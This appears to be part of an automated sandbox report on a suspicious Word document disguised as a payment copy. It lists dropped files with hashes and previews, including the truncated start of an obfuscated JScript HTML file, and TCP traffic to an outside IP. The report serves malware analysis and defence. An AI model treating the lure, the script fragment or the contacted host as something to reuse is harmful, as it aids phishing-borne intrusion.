    SHA-512:E93C0C34DF4D673203BE4CA5EB1179ED463255EF6084BED59BEC440B3742CFF6A94CAA0424DB968A6ECF580F6F4106ACED5285083F97772C655B8883D516C733
    Malicious:false
    Reputation:low
    Preview:......M.eFy...z/$..zl.K.e.yH...S,...X.F...Fa.q............................dn..5s$F..a..Ur........._{k..).E.pC....U.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):114
    Entropy (8bit):4.0043834000059455
    Encrypted:false
    SSDEEP:3:yVlgsRlz1lDCrrPjlYDYwlVlc3lX3pQlQMDZ276:yPblz1Rsr+YAc3lnLMDZ22
    MD5:29CE4C3AD91CA4ED32D0FE57B495FCC5
    SHA1:EFD857E3CAAFBDE2AE85672CFD4DCD99458CF465
    SHA-256:E19CB2B28AC900FD40B61E0807007B538CDEE091A0CA82F9A76ED48F997CB7C8
    SHA-512:6AE9097FBAF9A541667BB44C9A5999ECD23A35E2C2291486067D7110960C3F0D35FBD2DF82864EA376456F16D4CF0E510F5AEFB0144FBC3DB061EC68E36FEC8A
    Malicious:false
    Reputation:low
    Preview:..H..@....b..q....]F.S.D.-.{.9.D.7.4.1.6.6.3.-.0.E.5.4.-.4.7.3.1.-.8.0.9.5.-.2.2.2.D.B.9.2.A.C.F.5.6.}...F.S.D..

    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.2866055829360173
    Encrypted:false
    SSDEEP:48:I31CRB6Cyp8tAgBWZFbQRczx8tbu4WubrfDslgRpcCDC1H:KAL6CyYAgBWr2ceu4WunfQce1H
    MD5:8F0A4FA071D865E8A556C2157191813E
    SHA1:C92BC60B1C41760B7D4768C673AD0A4356FC8ED6
    SHA-256:3406B7EC52AC5F6955F939021B73EB1AFE6938BAB96EB60FEE8E7AD52799997D
    SHA-512:8EBCF339C677C2C42FDC9131A5FEBB31D49F928BF7A5C5DA0C0F6B8BC2B6A04644BD5BD2A8381CFF4D66BB9A215E1539EE397FF1DBC2C899A2A28134A328643D
    Malicious:false
    Reputation:low
    Preview:......M.eFy...zQ..3.O.M...L?.)S,...X.F...Fa.q...............................{..O.].'.D...........).....B......m.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FC3E07E1-8ECD-43E4-B52E-9C0E75945771}.FSD

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.22184406153599004
    Encrypted:false
    SSDEEP:48:I3+3UrBptM1865ZNUgqKS0ip6NIN1ZpIN1Z7:K+3CptivE0jy6NINHpINH7
    MD5:354B23BB2531B0571E7808EF78C2BDDB
    SHA1:5959F89837C462172341FB541F34BE8556378E0C
    SHA-256:C825D9DF8C6FFBC827CF12D1653ABB948DE07317F1EF7D5DD2E66E6B39B78497
    SHA-512:93DD7F49CCB09725D871B6C509721064EE89CA449B92C385610CE6F5F416188E842F556615864906E367C0AFE74880413D86FB53483BB96BFB02013E29471744
    Malicious:false
    Reputation:low
    Preview:......M.eFy...z...T.rM....)T..S,...X.F...Fa.q...............................7do.B.Y.n._R.........r......I...F.@.-P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):114
    Entropy (8bit):3.938508180669744
    Encrypted:false
    SSDEEP:3:yVlgsRlziLVNOlQglm7SwORgQ3ggOSjRYUC/l276:yPblziL/Ol18ew7Q3gajRYUCt22
    MD5:53F7D146048797564ACAEC8B2819EF0B
    SHA1:7DCC293F430710EC6929DFA75DDFB1EEC2A867E6
    SHA-256:18FCDCB36C0D51EF510D8A33065F575DDD212BB7D54FF3767D31AE26D2597345
    SHA-512:47EE50ACD25866E2B0EF2E20CA721C126E8D313FB6112F397877A6B12D1E989B79F64FFB930E022226BA5AA179DC4744A8CF3E4B35D2C24A2E665F58B40561FB
    Malicious:false
    Reputation:low
    Preview:..H..@....b..q....]F.S.D.-.{.F.C.3.E.0.7.E.1.-.8.E.C.D.-.4.3.E.4.-.B.5.2.E.-.9.C.0.E.7.5.9.4.5.7.7.1.}...F.S.D..

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\PROMZwFp385vXr[1]

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
    Category:dropped
    Size (bytes):8032
    Entropy (8bit):6.106485999431441
    Encrypted:false
    SSDEEP:96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
    MD5:7934E5C18F2C7C53DCE7C8C7CE55125D
    SHA1:8C75630C574D0745E4F3B71B26057C990E2BB467
    SHA-256:7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
    SHA-512:1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
    Malicious:false
    Reputation:low
    Preview:<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E5321AD.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
    Category:dropped
    Size (bytes):8032
    Entropy (8bit):6.106485999431441
    Encrypted:false
    SSDEEP:96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
    MD5:7934E5C18F2C7C53DCE7C8C7CE55125D
    SHA1:8C75630C574D0745E4F3B71B26057C990E2BB467
    SHA-256:7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
    SHA-512:1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
    Malicious:false
    Reputation:low
    Preview:<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DEABB9E.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
    Category:dropped
    Size (bytes):8032
    Entropy (8bit):6.106485999431441
    Encrypted:false
    SSDEEP:96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
    MD5:7934E5C18F2C7C53DCE7C8C7CE55125D
    SHA1:8C75630C574D0745E4F3B71B26057C990E2BB467
    SHA-256:7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
    SHA-512:1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
    Malicious:false
    Reputation:low
    Preview:<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1A7B07.jpg

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, description=OLYMPUS DIGITAL CAMERA , model=SP500UZ, software=Corel Photo Album 6, datetime=2007:10:21 17:05:13], baseline, precision 8, 480x640, components 3
    Category:dropped
    Size (bytes):111840
    Entropy (8bit):7.447827528335342
    Encrypted:false
    SSDEEP:3072:/y1vPicYqXVc2XcRz09vkDMaIRFzOuPiSlKd9Y:qdfYqX6G00zfaSlWY
    MD5:4D697D690AB2D1BAC4998162A6EEAE07
    SHA1:6864EAD35FB3B3FBE354AC8D7BC3AFA3204B9522
    SHA-256:23D679960625F65787692D74E87E324E5304B7F923E340322575D330FE510450
    SHA-512:201266787A62F1603C7B908A74B7FBE5A06E38CF581B8B8F8D8D56F9804C6020822E1C3B799321980DAD326E751CE9E0C969979BC96D4A62AC25D7C4259574A9
    Malicious:false
    Preview:......JFIF.....`.`.....vExif..MM.*............. .................1...........2..................................Q...........Q........!..Q........!...i..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):4608
    Entropy (8bit):2.2918709222363574
    Encrypted:false
    SSDEEP:24:rNKOUp03SHIDFJIDfrBexrBez7HrBeIiOID:rNKKtKfrBWrBYjrB/iD
    MD5:DDD1A7B7584FE963025B7877753363E9
    SHA1:3231DC3627E692457A46A5A232F3C08EED393593
    SHA-256:56E7BBA8F55A2766D6BFE10F89AC631AE171A800B017FC5E7BFA1B86830DFFAA
    SHA-512:34F084E344268DE2F67AD2674B6E2A7915E2F9023F79ED3E2C6BB3A12300321097C7A1139CE147D7B7BCFBBD2226FCE086094355B184053172A1E26454D55D5D
    Malicious:false
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2DAED936-6AE5-4EA6-A2A6-98457564935D}.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Targa image data - Color 32 x 7 x 32 +32 +7 "\007"
    Category:dropped
    Size (bytes):22016
    Entropy (8bit):3.726896001733367
    Encrypted:false
    SSDEEP:192:L/iOgOnpOwOdOiA4vzxO6LvF6iCs3LGL9Ql/XWMjZcLPOiCzS2zcFLNkIsehNACh:LTl0V4VF63Nr+eE1
    MD5:2D3B22EB9A941A88E1FBE9CC6F0AD47B
    SHA1:3BABC72BE2E9724860AFCBC84F6F084BCE67C05A
    SHA-256:077B64253FAF9C648A350EEB76A4583D396A9F390D2732B73E024DE756ECB52F
    SHA-512:B913ED1B0EA6AF625102C2E48C20084408B7C34067EF127FC4A0BFBC8B447A56D5F45659D6FE89694BF1224CB411CFF7EA76444361F036567B2EECA6A738CE41
    Malicious:false
    Preview:.. ..... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ...P.R.O.-.F.O.R.M.A. .I.N.V.O.I.C.E..... ....... ...C.o.m.p.a.n.y. .:...A.L. .J.A.D.D. .T.R.A.D.I.N.G. .&.C.O.N.T...E.S.T.....I.n.v.o.i.c.e. .#. .:. .1.4.7.1.9..... .....A.d.d.r.e.s.s. .:...S.A.L.A.L.A.H...O.M.A.N.....D.a.t.e. .:...1.7.-.0.7.-.2.0.1.9..... ......... ......... .....T.e.l. .:............................................. ...$...............................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D442B920-91E2-4DCA-989E-AADAC9D5BA07}.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\{152EB01C-EFF3-4579-AB93-1C52F4EF4381}

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.02557421810106493
    Encrypted:false
    SSDEEP:6:I3DPce3FvxggLRd68ShIKfljt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPJpSjbvYg3J/
    MD5:79629860A8A7062100568BA988AA92E5
    SHA1:04EB84E685B4ED1633C9A24F945CA4E4EFF440F9
    SHA-256:B4490EEF80275645ADF8E6DA434925E61B0C7E7CEC78BDA28C80A45593674C25
    SHA-512:44032143469737F083D1B979DD04BBC9C28DB3584812810DE216ADE8E0763D6FDBE6235F73A5582D86839EE63C963712BA36349F865723509E8D4A909DA3B45E
    Malicious:false
    Preview:......M.eFy...zQ..3.O.M...L?.)S,...X.F...Fa.q...................................D.'B...O..........).....B......m.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\{40442F01-F34C-4BAD-AD83-6BF4748B84A6}

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025598214431537702
    Encrypted:false
    SSDEEP:6:I3DPcA2VvxggLRqNf/XiZkqxFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPIZsXGdvYg3J/
    MD5:4E0BB04AF2E5963F5B13FE28926EA850
    SHA1:A1F8759D658FE4FD793A0C6756BE56CF1BAA6C5E
    SHA-256:144E84C6E11326F22EC9934B0C473BD33708C4D1AAC32A967D083E7A0F7B9742
    SHA-512:4037BD00DB042D87AADE73C529F218778ABF1675C6BD37F8AA25F4CE38E18E77470661710711D16B7D809AAEE9288C032F7A31A1CF46B882203D53A289CF4975
    Malicious:false
    Preview:......M.eFy...z2&&..L.I..)...S,...X.F...Fa.q............................)...w.5D..(T.w..........'d.....F.?I.O.P......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment copy_2911022.docx.LNK

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Tue Dec 20 21:07:13 2022, length=110504, window=hide
    Category:dropped
    Size (bytes):1089
    Entropy (8bit):4.586578560978497
    Encrypted:false
    SSDEEP:12:8ovgXg/XAlCPCHaXNBQtB/SxXX+Wdl91UWY5iEcH4icvbTXevyXl4KDtZ3YilMMe:8i/XT9SUXmWZEcHreHXevy1ZDv3q+u7D
    MD5:42568C6DD23F1300A99ED8669616B647
    SHA1:205A7AEEA5E8CC501DE65B0398F6511123590B6E
    SHA-256:403995B5D0C5466BCD2EA065BCFA60259DE797DA2B36290DC6D140F2FEBEF164
    SHA-512:16464D686024260D930ECA3255461A6130CD7B0B33A9474CAE72F7A03BBEE55B733BFB8195594F31E65A07FEC80ECBE9A06FFB1C91C4336430D251E9E4B30DBD
    Malicious:false
    Preview:L..................F.... .....r..3....r..3....0j.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......U. .PAYMEN~1.DOC..h......hT..hT..*...r.....'...............P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\Payment copy_2911022.docx.doc.4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X..

    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [doc]
    Category:dropped
    Size (bytes):101
    Entropy (8bit):4.8491372958945425
    Encrypted:false
    SSDEEP:3:bDuMJltDLhVjO1LXJFSmX1OeLhVjO1LXJFSv:bCmDFVyBZFEeFVyBZFc
    MD5:83166E435F433132ECCE71984113EC6B
    SHA1:630B8125CF2F042D3C939B375300C4A03B849927
    SHA-256:DEE2789C5DBCFF0EA579537C38D15E0626092269B5842B7D1BAAFBA4DC43F308
    SHA-512:DFE14FDBE0BC45AD547A41CE549670CD1F9B39210E698A09BF558D643B7159D740E7C52A2773F6F9E44AD9FF07DE877C8FDD709864CA8668556B86AA82135D9B
    Malicious:false
    Preview:[folders]..Templates.LNK=0..Payment copy_2911022.docx.LNK=0..[doc]..Payment copy_2911022.docx.LNK=0..

    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

    C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:Qn:Qn
    MD5:F3B25701FE362EC84616A93A45CE9998
    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
    Malicious:false
    Preview:..

    C:\Users\user\Desktop\~$yment copy_2911022.docx.doc

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

    Static File Info

    General

    File type:Microsoft Word 2007+
    Entropy (8bit):7.994989792624349
    TrID:
    • Word Microsoft Office Open XML Format document (49504/1) 49.01%
    • Word Microsoft Office Open XML Format document (43504/1) 43.07%
    • ZIP compressed archive (8000/1) 7.92%
    File name:Payment copy_2911022.docx.doc
    File size:110504
    MD5:cd3dbd5f1d468da826581361b619b393
    SHA1:9d5fc2d99aec7c8c18d8af7267b4a31801fda770
    SHA256:1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
    SHA512:91ae486d3b8a687ce2e994ee179161896f71f6c0e973b1ebd52ff856753ccc8cb5b7e0c7890c87158a558e74e061281d4bf6dd37e9941b3593a3ccbd77f71bdf
    SSDEEP:1536:oI2CqvURAICmRMMlzJEGEBwNQFgbLndOxR8qn7CJcsqKqLzDOfFGpt+rlTuq:vTADANPLNQUkRhnm9qKqqgt+r0q
    TLSH:56B3021A16401374FBCF83FCF954890FD85B2974EB05BE441E9CEEE8A4AD3411D2D669
    File Content Preview:PK........h..U...p`...T.......[Content_Types].xmlUT...H..cH..cH..c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C

    File Icon

    Icon Hash:e4eea2aaa4b4b4a4

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Dec 20, 2022 14:08:01.217870951 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:01.217945099 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:01.218025923 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:01.240758896 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:01.240813971 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:01.866564035 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:01.866779089 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:01.874716997 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:01.874756098 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:01.875518084 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:01.875665903 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:02.181982040 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:02.182032108 CET44349175118.27.125.229192.168.2.22
